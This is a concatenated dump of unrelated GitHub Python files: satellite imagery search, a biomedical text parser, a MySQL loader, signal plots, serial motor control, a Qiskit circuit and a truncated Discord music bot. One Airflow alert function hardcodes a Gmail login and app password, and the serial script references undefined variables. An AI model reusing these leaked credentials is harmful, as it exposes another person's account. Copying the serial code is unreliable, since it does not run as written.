search_kwargs[\"instrumentshortname\"] = instrument\n\n if producttype:\n search_kwargs[\"producttype\"] = producttype\n\n if cloud:\n if sentinel not in ['2', '3']:\n logger.error('Cloud cover is only supported for Sentinel 2 and 3.')\n raise ValueError('Cloud cover is only supported for Sentinel 2 and 3.')\n search_kwargs[\"cloudcoverpercentage\"] = (0, cloud)\n\n if query is not None:\n search_kwargs.update((x.split('=') for x in query.split(',')))\n\n if area_wkt is not None: # Pass through area_wkt\n search_kwargs['area'] = area_wkt\n elif geometry is not None:\n search_kwargs['area'] = geojson_to_wkt(read_geojson(geometry))\n\n if uuid is not None:\n uuid_list = [x.strip() for x in uuid.split(',')]\n products = {}\n for productid in uuid_list:\n try:\n products[productid] = api.get_product_odata(productid)\n except SentinelAPIError as e:\n if 'Invalid key' in e.msg:\n logger.error('No product with ID \\'%s\\' exists on server', productid)\n elif name is not None:\n search_kwargs[\"identifier\"] = name\n products = api.query(order_by=order_by, limit=limit, **search_kwargs)\n else:\n start = start or \"19000101\"\n end = end or \"NOW\"\n products = api.query(date=(start, end),\n order_by=order_by, limit=limit, **search_kwargs)\n\n if footprints is True:\n footprints_geojson = api.to_geojson(products)\n footprints_file = os.path.join(path, \"search_footprints.geojson\")\n with open(footprints_file, \"w\") as outfile:\n outfile.write(gj.dumps(footprints_geojson))\n returns['footprints_file'] = footprints_file\n\n if download is True:\n product_infos, failed_downloads = api.download_all(products, path)\n if len(failed_downloads) > 0:\n with open(os.path.join(path, \"corrupt_scenes.txt\"), \"w\") as outfile:\n for failed_id in failed_downloads:\n outfile.write(\"%s : %s\\n\" % (failed_id, products[failed_id]['title']))\n else:\n for product_id, props in products.items():\n if uuid is None:\n logger.info('Product %s - %s', product_id, props['summary'])\n else: # querying uuids has no summary key\n logger.info('Product %s - %s - 
%s MB', product_id, props['title'],\n round(int(props['size']) / (1024. * 1024.), 2))\n if uuid is None:\n logger.info('---')\n logger.info('%s scenes found with a total size of %.2f GB',\n len(products), api.get_products_size(products))\n\n return returns\n\n\n_set_logger_handler(_PROGRESS)\nlogger.debug(kwargs)\nreturns = cli(**kwargs)\n_load_to_canvas(returns.get('footprints_file', None))\n","repo_name":"sentinelsat/sentinelsat-qgis-script","sub_path":"sentinelsat_qgis_script.py","file_name":"sentinelsat_qgis_script.py","file_ext":"py","file_size_in_byte":8151,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"2"} +{"seq_id":"38275265244","text":"import logging\r\nimport re\r\nfrom typing import List, Generator, TextIO, Iterator, Union\r\n\r\nfrom bioc.pubtator.datastructure import PubTator, PubTatorAnn, PubTatorRel\r\n\r\nABSTRACT_PATTERN = re.compile(r'(.*?)\\|a\\|(.*)')\r\nTITLE_PATTERN = re.compile(r'(.*?)\\|t\\|(.*)')\r\n\r\n\r\ndef loads(s: str) -> List[PubTator]:\r\n \"\"\"\r\n Parse s (a str) to a list of Pubtator documents\r\n\r\n :return: a list of PubTator documents\r\n \"\"\"\r\n return list(iterparse_s(s.splitlines()))\r\n\r\n\r\ndef load(fp: TextIO) -> List[PubTator]:\r\n \"\"\"\r\n Parse file-like object to a list of Pubtator documents\r\n\r\n :param fp: file-like object\r\n :return: a list of PubTator documents\r\n \"\"\"\r\n return loads(fp.read())\r\n\r\n\r\ndef iterparse_s(line_iterator: Iterator[str]) \\\r\n -> Generator[PubTator, None, None]:\r\n \"\"\"\r\n Iterative parse each line\r\n \"\"\"\r\n logger = logging.getLogger(__name__)\r\n doc = PubTator()\r\n i = 0\r\n for i, line in enumerate(line_iterator, 1):\r\n if i % 100000 == 0:\r\n logger.debug('Read %d lines', i)\r\n line = line.strip()\r\n if not line:\r\n if doc.pmid and (doc.title or doc.abstract):\r\n yield doc\r\n doc = PubTator()\r\n continue\r\n matcher = TITLE_PATTERN.match(line)\r\n if matcher:\r\n doc.pmid = matcher.group(1)\r\n doc.title = matcher.group(2)\r\n continue\r\n matcher = ABSTRACT_PATTERN.match(line)\r\n if matcher:\r\n doc.pmid = matcher.group(1)\r\n doc.abstract = matcher.group(2)\r\n continue\r\n toks = line.split('\\t')\r\n if len(toks) >= 6:\r\n annotation = loads_ann(toks)\r\n doc.add_annotation(annotation)\r\n elif len(toks) == 4:\r\n relation = PubTatorRel(toks[0], toks[1], toks[2], toks[3])\r\n doc.add_relation(relation)\r\n elif len(toks) == 5:\r\n relation = PubTatorRel(toks[0], toks[1], toks[2], toks[3], toks[4])\r\n doc.add_relation(relation)\r\n else:\r\n print('%i: Cannot parse: \"%r\"' % (i, line))\r\n\r\n if doc.pmid and (doc.title or doc.abstract):\r\n yield doc\r\n logger.debug('Read %d lines', i)\r\n\r\n\r\ndef iterparse(fp: TextIO) -> Generator[PubTator, None, None]:\r\n \"\"\"\r\n Iteratively parse fp (file-like object) in pubtator format\r\n \"\"\"\r\n return iterparse_s(fp)\r\n\r\n\r\ndef loads_ann(s: Union[str, List[str]]) -> PubTatorAnn:\r\n \"\"\"\r\n Parse s (a str) in the Pubtator annotation format\r\n \"\"\"\r\n if isinstance(s, str):\r\n toks = s.split('\\t')\r\n else:\r\n toks = s\r\n\r\n if len(toks) == 6:\r\n return PubTatorAnn(pmid=toks[0], start=int(toks[1]), end=int(toks[2]),\r\n text=toks[3], type=toks[4], id=toks[5])\r\n\r\n if len(toks) == 7 and '|' in toks[5] and '|' in toks[6]:\r\n ids = toks[5].split('|')\r\n texts = toks[6].split('|')\r\n if len(ids) != len(texts):\r\n raise ValueError('Cannot parse entity. %s concept but %s text. 
%s'\r\n % (len(ids), len(texts), s))\r\n return PubTatorAnn(pmid=toks[0], start=int(toks[1]), end=int(toks[2]),\r\n text=toks[3], type=toks[4], id=toks[5])\r\n\r\n if len(toks) == 7:\r\n return PubTatorAnn(toks[0], int(toks[1]), int(toks[2]), toks[3],\r\n toks[4], toks[5], toks[6:])\r\n\r\n raise ValueError('Cannot parse: %s' % s)\r\n","repo_name":"bionlplab/bioc","sub_path":"src/bioc/pubtator/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"2"} +{"seq_id":"18153244743","text":"import logging\nimport subprocess\n\nimport os\nimport sys\n\nfrom ._base_service_controller import ServiceControllerBase\nfrom ..default_settings import WAIT_TIME_MULTIPLIER\n\nWA_SERVICE_SCRIPT = os.getenv(\"WA_SERVICE_SCRIPT\")\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass ServiceController(ServiceControllerBase):\n\n _subprocess = None\n\n def start_service(self):\n assert WA_SERVICE_SCRIPT is not None, repr(WA_SERVICE_SCRIPT)\n params = WA_SERVICE_SCRIPT.split(\"|\")\n # self._subprocess might already exist but have crashed\n command = [sys.executable] + params\n cwd = os.path.dirname(params[0] if params else sys.executable) or None\n logger.info(\"GUI is launching service via Popen command %r, in cwd %r\", command, cwd)\n self._subprocess = subprocess.Popen(command, shell=False, cwd=cwd)\n\n def stop_service(self):\n self._send_message(\"/stop_server\")\n if self._subprocess: # Else, service already existed at App launch... give up\n try:\n self._subprocess.wait(timeout=10 * WAIT_TIME_MULTIPLIER)\n except subprocess.TimeoutExpired:\n logger.error(\"Service subprocess didn't exit gracefully, we kill it now\")\n self._subprocess.kill()\n","repo_name":"WitnessAngel/witness-angel-components","sub_path":"src/wacomponents/service_control/_subprocess_service_controller.py","file_name":"_subprocess_service_controller.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"7791916189","text":"import smtplib\nfrom email.message import EmailMessage\n\ndef send_mail_onfail(dag_id):\n smtp_server = smtplib.SMTP('smtp.gmail.com', 587)\n smtp_server.starttls()\n smtp_server.login('xrrishdummy@gmail.com', 'fapizjbrcbhnkhfi')\n\n message = EmailMessage()\n message['From'] = 'xrrishdummy@gmail.com'\n message['To'] = 'krishgoal2000@gmail.com'\n message['Subject'] = '! 
Dag failing ALert !!'\n message.set_content('The dag_id has been failed')\n\n smtp_server.send_message(message, 'xrrishdummy@gmail.com', 'krishgoal2000@gmail.com')\n\n smtp_server.quit()","repo_name":"krrish1311/Airflow-Dags","sub_path":"indrajeet_bhaiyaa.py","file_name":"indrajeet_bhaiyaa.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"38986560539","text":"import pandas as pd\nimport sys\nsys.path.append('../')\ndata = pd.read_csv('HINDALCO.csv', index_col=False, delimiter = ',')\ndata.head()\n\nimport mysql.connector as msql\nfrom mysql.connector import Error\n\ntry:\n\tconn = msql.connect(host='localhost', database='assignment', user='prince', password='123456789')\n\tcursor = conn.cursor()\n\tcursor.execute(\"select database();\")\n\trecord = cursor.fetchone()\n\tprint(\"You're connected to database: \",record)\n\tcursor.execute('DROP TABLE IF EXISTS hinda;')\n\tprint('Creating table....')\n\n\tcursor.execute(\"CREATE TABLE hinda(datetime datetime,close decimal, high decimal,low decimal, open decimal,volume int,instrument char(25))\")\n\tprint(\"Table is created....\")\n\n\n\tfor i,row in data.iterrows():\n\t\t\t\tsql = \"INSERT INTO assignment.hinda VALUES (%s,%s,%s,%s,%s,%s,%s)\"\n\t\t\t\tcursor.execute(sql, tuple(row))\n\t\t\t\t\n\t\t\t\t# the connection is not autocommitted by default, so we must commit to save our changes\n\t\t\t\tconn.commit()\n\tprint(\"Record inserted\")\n\t\nexcept Error as e:\n print(\"Error while connecting to MySQL\", e)","repo_name":"princeuche1/SMA-trading-strategy","sub_path":"connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"27707159116","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 16 17:30:12 2020\r\n\r\n@author: ANSQUER\r\n@author: ROOS\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport scipy.signal as sig\r\n\r\n\r\nKs = [-1, 2,0.5] # coefficient multiplicateur au numérateur sans unité (ce sera votre T0 ou votre Tinfini)\r\nfc = 2000 # fréquence de cassure en Hz\r\n\r\nwc = 2*np.pi*fc\r\nw = np.logspace(1,7,1000) # permet de répartir les points de calculs régulièrement sur une echelle log. 
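The CSV-to-MySQL loader above calls `cursor.execute` and `conn.commit` once per DataFrame row, which issues one round trip and one transaction per record. A hedged alternative, continuing from the `data`, `cursor`, and `conn` variables defined in that snippet, batches the rows with `mysql.connector`'s `executemany` and commits once (column order is assumed to match the CSV, exactly as in the original loop):

```python
# Batch insert: one executemany call and a single commit instead of per-row commits.
rows = list(data.itertuples(index=False, name=None))  # list of plain tuples
sql = "INSERT INTO assignment.hinda VALUES (%s,%s,%s,%s,%s,%s,%s)"
cursor.executemany(sql, rows)
conn.commit()
```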
ici : 1000points de 10^1 à 10^7\r\nf = w/2/np.pi #génération d'un autre tableur de valeurs en Hz,correleées à w permettant un affichage des Bode en Hz\r\n\r\n\r\nfor K in Ks:\r\n den = [1/wc,1] #denominateur sous forme canonique : le 1er terme est d'ordre 1, le 2e d'ordre 0\r\n numLP=[K] #numerateur d'un passe bas\r\n numHP=[K/wc, 0] #numerateur d'un passe haut\r\n H=sig.lti(numHP,den) # definition du système linéaire à étudier , vous choisissez votre numérateur\r\n w, T = H.freqresp(w=w) #T représente la fonction de transfert complexe du systeme linéaire\r\n\r\n\r\n # diagrammes de Bode\r\n plt.figure(1)\r\n C1 = plt.loglog(f, abs(T), label =\"module\") #generation de la courbe de module en fonction de f\r\n C2 = plt.loglog(f, (abs(K)*np.ones(len(f))),color=\"blue\", dashes=[6, 2],label =\"THF\" ) #asymptote BF (cas du passe bas) de module en pointillés\r\n C3 = plt.loglog(f, abs(K*f/fc),color=\"green\", dashes=[6, 2],label =\"TBF\" )\r\n plt.xlabel(\"f(Hz)\")\r\n plt.ylabel(\"amplification\")\r\n plt.grid()\r\n plt.legend()\r\n\r\n\r\n plt.figure(2)\r\n C4= plt.semilogx(f,(180*np.angle(T))/np.pi, label =\"argument\") #generation de la courbe d'argument en fonction de f\r\n plt.xlabel(\"f(Hz)\")\r\n plt.ylabel(\"déphasage\")\r\n plt.grid()\r\n plt.legend()\r\n\r\n\r\n\r\n # reponse indicielle\r\n t_e = np.arange(0,10/wc,0.000001) #création du tableau d'instants pour le calcul : de -1/wc à 10/w0 avec des intervalles de 1µs\r\n [t,s] = H.step(T=t_e) # réponse indicielle du système sur la durée t_e\r\n #ajout de 2 points avant t=0 pour mieux visualiser les phénomènes à t =0\r\n t = np.hstack(([-0.001,-0.00001,0],t))\r\n s = np.hstack(([0,0,0],s))\r\n\r\n e = (t>=0) #création d'un vecteur de même taille que t. le code renvoie 0 si faux, 1 si vrai\r\n\r\n plt.figure(3)\r\n plt.plot(t*1000,e,label=\"échelon d'entrée\", color='b') #axe en ms\r\n plt.plot(t*1000,s,label=\"reponse indicielle\", color='r')\r\n plt.grid()\r\n plt.xlabel(\"temps (ms)\")\r\n plt.ylabel('tensions en volts')\r\n plt.grid(which='both', axis='both')\r\n plt.legend()\r\nplt.show()\r\n\r\n","repo_name":"Slashformotion-s-Graveyard/ELEC_S4","sub_path":"1_INTRO_PYTHON/grapheur_ordre1_2020.py","file_name":"grapheur_ordre1_2020.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"10368301352","text":"import serial\r\n\r\ndef send_state_message(state_serial_port, state_message_id):\r\n state_message = f\"{state_message_id},{state}\\n\"\r\n state_serial_port.write(message.encode())\r\n\r\ndef send_motor_message(motor_serial_port, motor_message_id, left_direction, right_direction, left_speed, right_speed):\r\n motor_message = f\"{motor_message_id},{left_direction},{right_direction},{left_speed},{right_speed}\\n\"\r\n motor_serial_port.write(message.encode())\r\n\r\ndef receive_ultrasonic_data(): \r\n print(\"hi\")\r\n\r\n\r\n# Serial port configuration\r\nstate_serial_port = serial.Serial('/dev/ttyUSB0', 9600) # Replace '/dev/ttyUSB0' with the appropriate serial port\r\n\r\n# Serial port configuration\r\nmotor_serial_port = serial.Serial('/dev/ttyUSB0', 9600) # Replace '/dev/ttyUSB0' with the appropriate serial port\r\n\r\n\r\n# Example usage\r\nstate_message_id = 1\r\nstate = \"manual\" #manual, autonomous, debug, Estopped\r\n\r\n# Example motor usage\r\nmotor_message_id = 1\r\nleft_direction = \"CCW\" #CCW or CW\r\nright_direction = \"CCW\" #CCW or CW\r\nleft_speed = 500\r\nright_speed = 500\r\n\r\n\r\n\r\n# Send the state 
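The Bode script above (comments in French: "fréquence de cassure" is the corner frequency, and the asymptote labels "TBF"/"THF" mean very-low/very-high frequency) plots first-order responses with fc = 2 kHz. A quick numeric check that complements the plots: at ω = ωc, a first-order low-pass K/(1 + jω/ωc) sits exactly 3 dB below its passband level:

```python
import numpy as np

K = 2.0
fc = 2000.0
wc = 2 * np.pi * fc

# First-order low-pass evaluated at the corner frequency w = wc:
T_at_wc = K / (1 + 1j * wc / wc)              # = K / (1 + j)
assert np.isclose(abs(T_at_wc), abs(K) / np.sqrt(2))
print(20 * np.log10(abs(T_at_wc) / abs(K)))   # ≈ -3.01 dB
```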
message\r\nsend_state_message(state_serial_port, state_message_id, state)\r\n\r\n# Send the motor message\r\nsend_motor_message(motor_serial_port, motor_message_id, left_direction, right_direction, left_speed, right_speed)\r\n\r\n# Close the state serial port\r\nstate_serial_port.close()\r\n\r\n# Close the motor serial port\r\nserial_port.close()\r\n\r\n\r\n","repo_name":"SrMeissel/IGVC_Murphy","sub_path":"Raspberry/SerialCommunication.py","file_name":"SerialCommunication.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26676109017","text":"from typing import List\n\nimport math\nfrom qiskit.circuit import QuantumCircuit\nfrom qiskit.circuit.exceptions import CircuitError\n\nfrom .generalized_gates.diagonal import Diagonal\n\n\nclass FourierChecking(QuantumCircuit):\n \"\"\"Fourier checking circuit.\n\n The circuit for the Fourier checking algorithm, introduced in [1],\n involves a layer of Hadamards, the function :math:`f`, another layer of\n Hadamards, the function :math:`g`, followed by a final layer of Hadamards.\n The functions :math:`f` and :math:`g` are classical functions realized\n as phase oracles (diagonal operators with {-1, 1} on the diagonal).\n\n The probability of observing the all-zeros string is :math:`p(f,g)`.\n The algorithm solves the promise Fourier checking problem,\n which decides if f is correlated with the Fourier transform\n of g, by testing if :math:`p(f,g) <= 0.01` or :math:`p(f,g) >= 0.05`,\n promised that one or the other of these is true.\n\n The functions :math:`f` and :math:`g` are currently implemented\n from their truth tables but could be represented concisely and\n implemented efficiently for special classes of functions.\n\n Fourier checking is a special case of :math:`k`-fold forrelation [2].\n\n **Reference:**\n\n [1] S. Aaronson, BQP and the Polynomial Hierarchy, 2009 (Section 3.2).\n `arXiv:0910.4698 `_\n\n [2] S. Aaronson, A. Ambainis, Forrelation: a problem that\n optimally separates quantum from classical computing, 2014.\n `arXiv:1411.5729 `_\n \"\"\"\n\n def __init__(self, f: List[int], g: List[int]) -> None:\n \"\"\"Create Fourier checking circuit.\n\n Args:\n f: truth table for f, length 2**n list of {1,-1}.\n g: truth table for g, length 2**n list of {1,-1}.\n\n Raises:\n CircuitError: if the inputs f and g are not valid.\n\n Reference Circuit:\n .. 
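The serial script that just ended has three bugs worth flagging: `send_state_message` builds `state_message` but writes an undefined `message` (a NameError), its two-parameter signature omits the `state` argument that the call site passes (a TypeError), and the final cleanup calls `serial_port.close()` on a name that was never defined (presumably `motor_serial_port` was intended). Both port objects also open the same `/dev/ttyUSB0`, which looks like a copy-paste placeholder. A corrected sketch of the two senders, keeping the same comma-separated framing:

```python
import serial

def send_state_message(port: serial.Serial, message_id: int, state: str) -> None:
    # Accept `state` explicitly instead of relying on a global.
    state_message = f"{message_id},{state}\n"
    port.write(state_message.encode())  # write the variable that was built

def send_motor_message(port: serial.Serial, message_id: int,
                       left_dir: str, right_dir: str,
                       left_speed: int, right_speed: int) -> None:
    motor_message = f"{message_id},{left_dir},{right_dir},{left_speed},{right_speed}\n"
    port.write(motor_message.encode())
```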
plot::\n\n from qiskit.circuit.library import FourierChecking\n from qiskit.tools.jupyter.library import _generate_circuit_library_visualization\n f = [1, -1, -1, -1]\n g = [1, 1, -1, -1]\n circuit = FourierChecking(f, g)\n _generate_circuit_library_visualization(circuit)\n \"\"\"\n num_qubits = math.log2(len(f))\n\n if len(f) != len(g) or num_qubits == 0 or not num_qubits.is_integer():\n raise CircuitError(\n \"The functions f and g must be given as truth \"\n \"tables, each as a list of 2**n entries of \"\n \"{1, -1}.\"\n )\n\n circuit = QuantumCircuit(num_qubits, name=f\"fc: {f}, {g}\")\n\n circuit.h(circuit.qubits)\n\n circuit.compose(Diagonal(f), inplace=True)\n\n circuit.h(circuit.qubits)\n\n circuit.compose(Diagonal(g), inplace=True)\n\n circuit.h(circuit.qubits)\n\n super().__init__(*circuit.qregs, name=circuit.name)\n self.compose(circuit.to_gate(), qubits=self.qubits, inplace=True)\n","repo_name":"Qiskit/qiskit","sub_path":"qiskit/circuit/library/fourier_checking.py","file_name":"fourier_checking.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","stars":4020,"dataset":"github-code","pt":"22"} +{"seq_id":"73991617337","text":"import random\nimport asyncio\nimport time\nimport math\n\nimport yaml\nimport discord\n\nfrom urllib.parse import urlparse\nfrom collections import OrderedDict, deque\nfrom psycopg2.extras import Json\nfrom datetime import datetime\n\nfrom enum import Enum, IntEnum\nfrom youtube_dl import YoutubeDL\nfrom tinytag import TinyTag\n\nfrom jshbot import utilities, configurations, data, plugins, logger\nfrom jshbot.exceptions import ConfiguredBotException, BotException\nfrom jshbot.commands import (\n Command, SubCommand, Shortcut, ArgTypes, Attachment, Arg, Opt, MessageTypes, Response)\n\n__version__ = '0.3.12'\nCBException = ConfiguredBotException('Music playlist')\nuses_configuration = True\n\nTITLE_LIMIT = 50 # Track title character limit in the track explorer\nURL_LIMIT = 140 # Track URL limit to be displayed in the track explorer\nMIRROR_TIMER = 60 # Chat mirror timer in seconds\n\nclass States(IntEnum):\n PLAYING, PAUSED, STOPPED, LOADING = range(4)\n\nclass Modes(IntEnum):\n PLAYLIST, QUEUE = range(2)\n\nclass Control(IntEnum):\n ALL, PARTIAL, DJS = range(3)\n\n\n@plugins.command_spawner\ndef get_commands(bot):\n\n max_threshold = configurations.get(bot, __name__, key='max_threshold')\n max_cutoff = configurations.get(bot, __name__, key='max_cutoff')\n max_user_track_limit = configurations.get(bot, __name__, key='max_user_track_limit')\n max_total_track_limit = configurations.get(bot, __name__, key='max_total_track_limit')\n\n async def check_whitelist(bot, context):\n config = configurations.get(bot, __name__)\n if config['use_whitelist'] and context.guild.id not in config['whitelist']:\n raise CBException(\"This server is not in the music player whitelist.\")\n\n new_commands = []\n\n new_commands.append(Command(\n 'playlist', subcommands=[\n SubCommand(\n Opt('tracks'), doc='View the entire playlist', function=format_tracklist),\n SubCommand(\n Opt('import'),\n Opt('youtube', attached='url', optional=True, quotes_recommended=False),\n Attachment('tracklist file', optional=True),\n doc='Adds the tracks in the attached tracklist file, '\n 'or from the YouTube playlist link. 
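The `FourierChecking` docstring above already fixes example truth tables; a minimal usage sketch built from them (assuming a Qiskit install that exports the class from `qiskit.circuit.library` as the repo layout suggests; the probability of the all-zeros outcome is the p(f,g) statistic the docstring describes):

```python
from qiskit.circuit.library import FourierChecking

f = [1, -1, -1, -1]   # truth table for f over 2**n = 4 entries, so n = 2 qubits
g = [1, 1, -1, -1]    # truth table for g, same length

circuit = FourierChecking(f, g)   # H layer, diag(f), H layer, diag(g), H layer
print(circuit.num_qubits)         # 2
print(circuit.decompose().draw()) # decompose to see the H/Diagonal structure
```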
Only DJs can import '\n 'tracks to prevent abuse.',\n function=import_tracklist),\n SubCommand(\n Opt('info'),\n Arg('track number', quotes_recommended=False, convert=int),\n doc='Retrieves the song information of the given track number.',\n function=get_info),\n SubCommand(\n Opt('add'),\n Arg('query', argtype=ArgTypes.MERGED),\n doc='Adds a song to the playlist. Can either be a URL to a supported site '\n '(YouTube, Bandcamp, SoundCloud, etc.) or a YouTube search query',\n function=add_track),\n SubCommand(\n Opt('remove'),\n Arg('track number', quotes_recommended=False, convert=int),\n doc='Removes the given track number from the playlist.',\n function=remove_track),\n SubCommand(\n Opt('volume'),\n Arg('percent', quotes_recommended=False,\n convert=utilities.PercentageConverter(),\n check=lambda b, m, v, *a: 0.01 <= v <= 1.0,\n check_error='Must be between 1% and 100% inclusive.'),\n doc='Sets the player volume to the given percentage.',\n function=set_volume),\n SubCommand(\n Opt('configure'),\n Opt('threshold', attached='seconds', optional=True, group='options',\n quotes_recommended=False, convert=int,\n check=lambda b, m, v, *a: 10 <= v <= max_threshold,\n check_error='Must be between 10 and {} seconds.'.format(max_threshold)),\n Opt('cutoff', attached='seconds', optional=True, group='options',\n quotes_recommended=False, convert=int,\n check=lambda b, m, v, *a: 10 <= v <= max_cutoff,\n check_error='Must be between 10 and {} seconds.'.format(max_cutoff)),\n Opt('usertracks', attached='limit', optional=True, group='options',\n quotes_recommended=False, convert=int,\n check=lambda b, m, v, *a: 0 <= v <= max_user_track_limit,\n check_error='Must be between 0 and {}.'.format(max_user_track_limit),\n doc='Limits the number of tracks users can add to the player. 0 for no limit'),\n Opt('totaltracks', attached='limit', optional=True, group='options',\n quotes_recommended=False, convert=int,\n check=lambda b, m, v, *a: 0 <= v <= max_total_track_limit,\n check_error='Must be between 0 and {}.'.format(max_total_track_limit),\n doc='Limits the total number of tracks for the player. 
0 for no limit'),\n Opt('djrole', attached='role', optional=True, group='options',\n convert=utilities.RoleConverter()),\n Opt('channel', attached='text channel', optional=True, group='options',\n quotes_recommended=False,\n convert=utilities.ChannelConverter(constraint=discord.TextChannel),\n doc='Sets the text channel the player will use for the interface.'),\n Opt('switchcontrol', optional=True, group='options',\n doc='Switches between DJ only, partial, and public control types.'),\n Opt('switchmode', optional=True, group='options',\n doc='Switches between repeating playlist and single play queue mode.'),\n Opt('mirrorchat', optional=True, group='options',\n doc='Mirrors the last few chat messages to a message above the player.'),\n Opt('autodisconnect', optional=True, group='options',\n doc='Automatically disconnects the bot if all users leave the channel.'),\n doc='Configures the music player properties.',\n function=configure_player),\n SubCommand(Opt('clear'), doc='Clears the playlist.', function=clear_playlist),\n SubCommand(\n Opt('page'),\n Arg('number', convert=int, quotes_recommended=False),\n doc='Displays the given page.', function=skip_to_page),\n SubCommand(\n Opt('swap'),\n Arg('track 1', convert=int, quotes_recommended=False),\n Arg('track 2', convert=int, quotes_recommended=False),\n doc='Swaps the position of the given tracks.', function=swap_tracks),\n SubCommand(\n Opt('control'),\n Opt('pause', optional=True, group='action'),\n Opt('resume', optional=True, group='action'),\n Opt('stop', optional=True, group='action'),\n Opt('next', optional=True, group='action'),\n Opt('skip', optional=True, group='action'),\n Opt('previous', optional=True, group='action'),\n doc='Basic controls for the player. Only one option can be provided at a time.',\n confidence_threshold=10, function=control_player),\n SubCommand(\n Opt('play'),\n Opt('track', attached='track number', optional=True,\n quotes_recommended=False, convert=int,\n doc='Plays the given track number.'),\n Arg('query', argtype=ArgTypes.MERGED_OPTIONAL,\n doc='Either a URL to a supported site (YouTube, Bandcamp, '\n 'SoundCloud, etc.), or a YouTube search query.'),\n confidence_threshold=5, doc='Plays (or adds) the given track.',\n function=setup_player, id='play'),\n SubCommand(doc='Shows the music player interface.', function=setup_player, id='show'),\n ],\n shortcuts=[\n Shortcut('p', '{arguments}', Arg('arguments', argtype=ArgTypes.MERGED_OPTIONAL)),\n Shortcut('add', 'add {query}', Arg('query', argtype=ArgTypes.MERGED)),\n Shortcut('remove', 'remove {number}', Arg('number', argtype=ArgTypes.MERGED)),\n Shortcut('volume', 'volume {percent}', Arg('percent', argtype=ArgTypes.MERGED)),\n Shortcut(\n 'play', 'play {arguments}',\n Arg('arguments', argtype=ArgTypes.MERGED_OPTIONAL)),\n Shortcut('pause', 'control pause'),\n Shortcut('resume', 'control resume'),\n Shortcut('skip', 'control skip'),\n Shortcut('next', 'control next'),\n Shortcut('previous', 'control previous')],\n allow_direct=False, category='music',\n pre_check=check_whitelist, description='Play music.'))\n\n return new_commands\n\n\n@plugins.db_template_spawner\ndef get_templates(bot):\n return {\n 'playlist_template': (\n \"url text,\"\n \"downloadurl text,\"\n \"title text,\"\n \"duration integer,\"\n \"userid bigint,\"\n \"timestamp bigint,\"\n \"extra json,\"\n \"id serial UNIQUE\"\n )\n }\n\n\nclass MusicPlayer():\n\n def __init__(self, bot, message, autoplay=False, track_index=None):\n\n # Discord information\n self.bot = bot\n self.channel = 
message.channel\n self.author = message.author\n self.voice_channel = message.author.voice.channel\n self.guild = message.guild\n self.voice_client = None\n self.source = None\n self.embed = None\n self.message = None # Set later\n self.satellite_message = None\n self.satellite_data = None\n self.mirror_message = None\n self.mirror_last_notification = None\n self.mirror_notifications = deque(maxlen=5)\n self.mirror_chats = deque(maxlen=12)\n\n # Update/internal tasks\n self.timer_task = None # Player timer\n self.command_task = None # Waits for reaction commands\n self.progress_task = None # Refreshes the progress bar\n self.state_check_task = None # Checks voice state changes\n self.chat_mirror_task = None # Mirrors chat every 10 seconds\n self.autoplay_task = None # Short-lived task for autostarting the player\n\n # Player information\n self.state = States.LOADING\n self.loading_interface = False\n self.first_time_startup = True\n self.now_playing = None\n self.notification = None\n self.page = 0\n self.progress = 0\n self.start_time = 0\n self.last_interface_update = 0\n self.listeners = 0\n self.skip_voters = []\n self.skip_threshold = 0.5\n self.shuffle_stack = []\n self.autopaused = False\n self.tracklist = None\n self.tracklist_url = ''\n self.tracklist_time = 0\n self.tracklist_update_time = 0\n self.update_tracklist()\n self.update_config()\n\n if self.mode == Modes.QUEUE:\n self.track_index = 0 # Track index in queue mode doesn't change\n else:\n if self.shuffle and self.tracklist:\n self.track_index = random.randint(0, len(self.tracklist) - 1)\n else:\n self.track_index = data.get(\n self.bot, __name__, 'last_index', guild_id=self.guild.id, default=0)\n if not 0 <= self.track_index < len(self.tracklist):\n self.track_index = 0\n\n # Build interface\n asyncio.ensure_future(self._connect(autoplay=autoplay, track_index=track_index))\n\n def update_config(self):\n guild_id = self.guild.id\n default_threshold = configurations.get(self.bot, __name__, key='max_threshold')\n default_cutoff = configurations.get(self.bot, __name__, key='max_cutoff')\n\n self.threshold = data.get(\n self.bot, __name__, 'threshold', guild_id=guild_id, default=default_threshold)\n self.cutoff = data.get(\n self.bot, __name__, 'cutoff', guild_id=guild_id, default=default_cutoff)\n self.control = data.get(\n self.bot, __name__, 'control', guild_id=guild_id, default=Control.PARTIAL)\n self.mode = data.get(\n self.bot, __name__, 'mode', guild_id=guild_id, default=Modes.QUEUE)\n self.shuffle = data.get(\n self.bot, __name__, 'shuffle', guild_id=guild_id, default=Modes.QUEUE)\n self.mirror_chat = data.get(\n self.bot, __name__, 'mirror_chat', guild_id=guild_id, default=False)\n self.auto_disconnect = data.get(\n self.bot, __name__, 'auto_disconnect', guild_id=guild_id, default=False)\n\n self.volume = data.get(self.bot, __name__, 'volume', guild_id=guild_id, default=1.0)\n if self.source:\n self.source.volume = self.volume\n\n # Actively update threshold/cutoff timer\n if self.timer_task and self.state == States.PLAYING:\n self.timer_task.cancel()\n self.timer_task = asyncio.ensure_future(\n self._track_timer(*self._get_delay(config_update=True)))\n\n async def _connect(self, autoplay=False, track_index=None):\n is_mod = data.is_mod(self.bot, member=self.author)\n try:\n self.voice_client = await utilities.join_and_ready(\n self.bot, self.voice_channel, is_mod=is_mod, reconnect=True)\n except Exception as e:\n self.state = 